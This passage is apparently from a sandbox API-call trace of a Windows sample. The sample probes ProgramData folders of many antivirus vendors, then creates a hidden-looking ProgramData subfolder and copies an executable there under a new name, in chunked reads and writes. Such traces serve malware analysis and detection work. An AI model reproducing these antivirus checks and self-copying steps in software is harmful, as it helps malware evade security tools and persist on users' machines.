(lpFileName="C:\\ProgramData\\Avira" (normalized: "c:\\programdata\\avira")) returned 0xffffffff [0116.303] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21610e8 [0116.303] GetFileAttributesA (lpFileName="C:\\ProgramData\\Kaspersky Lab" (normalized: "c:\\programdata\\kaspersky lab")) returned 0xffffffff [0116.303] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161130 [0116.303] GetFileAttributesA (lpFileName="C:\\ProgramData\\ESET" (normalized: "c:\\programdata\\eset")) returned 0xffffffff [0116.303] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161178 [0116.303] GetFileAttributesA (lpFileName="C:\\ProgramData\\Panda Security" (normalized: "c:\\programdata\\panda security")) returned 0xffffffff [0116.303] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21611c0 [0116.303] GetFileAttributesA (lpFileName="C:\\ProgramData\\Doctor Web" (normalized: "c:\\programdata\\doctor web")) returned 0xffffffff [0116.303] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161208 [0116.303] GetFileAttributesA (lpFileName="C:\\ProgramData\\AVG" (normalized: "c:\\programdata\\avg")) returned 0xffffffff [0116.303] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161250 [0116.304] GetFileAttributesA (lpFileName="C:\\ProgramData\\360TotalSecurity" (normalized: "c:\\programdata\\360totalsecurity")) returned 0xffffffff [0116.304] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161298 [0116.304] GetFileAttributesA (lpFileName="C:\\ProgramData\\Bitdefender" (normalized: "c:\\programdata\\bitdefender")) returned 0xffffffff [0116.304] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21612e0 [0116.304] GetFileAttributesA (lpFileName="C:\\ProgramData\\Norton" (normalized: "c:\\programdata\\norton")) returned 0xffffffff [0116.304] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161328 [0116.304] GetFileAttributesA (lpFileName="C:\\ProgramData\\Sophos" (normalized: "c:\\programdata\\sophos")) returned 0xffffffff [0116.304] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161370 [0116.304] GetFileAttributesA (lpFileName="C:\\ProgramData\\Comodo" (normalized: "c:\\programdata\\comodo")) returned 0xffffffff [0116.304] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21613b8 [0116.304] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161400 [0116.305] CreateFileA (lpFileName="c:\\programdata\\a7963\\tlworker.exe" (normalized: "c:\\programdata\\a7963\\tlworker.exe"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20000000, hTemplateFile=0x0) returned 0xffffffff [0116.305] GetFileAttributesA (lpFileName="C:\\ProgramData\\a7963" (normalized: "c:\\programdata\\a7963")) returned 0xffffffff [0116.305] CreateDirectoryA (lpPathName="C:\\ProgramData\\a7963" (normalized: "c:\\programdata\\a7963"), lpSecurityAttributes=0x0) returned 1 [0116.358] GetFileAttributesA (lpFileName="C:\\ProgramData\\a7963" (normalized: "c:\\programdata\\a7963")) returned 0x2010 [0116.358] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x18) returned 0x2161448 [0116.359] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x18) returned 0x2161468 [0116.359] CreateFileA (lpFileName="c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f7c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0116.359] GetFileType (hFile=0x1b8) returned 0x1 [0116.359] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x18) returned 0x2161488 [0116.359] CreateFileA (lpFileName="c:\\programdata\\a7963\\tlworker.exe" (normalized: "c:\\programdata\\a7963\\tlworker.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x19f7b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0116.360] GetFileType (hFile=0x1bc) returned 0x1 [0116.360] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1000) returned 0x21628d0 [0116.361] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.362] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1000) returned 0x21638d8 [0116.362] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.362] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.364] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.364] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.365] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.365] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.366] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.366] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.367] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.367] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.367] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.368] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.368] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.368] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.369] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.369] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.370] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.370] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.385] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.385] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.386] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.386] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.387] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.387] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.388] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.388] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.388] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.389] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.389] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.389] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.390] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.390] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.390] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.390] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.390] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.390] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.391] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.392] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.393] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.394] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.395] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.396] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.396] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 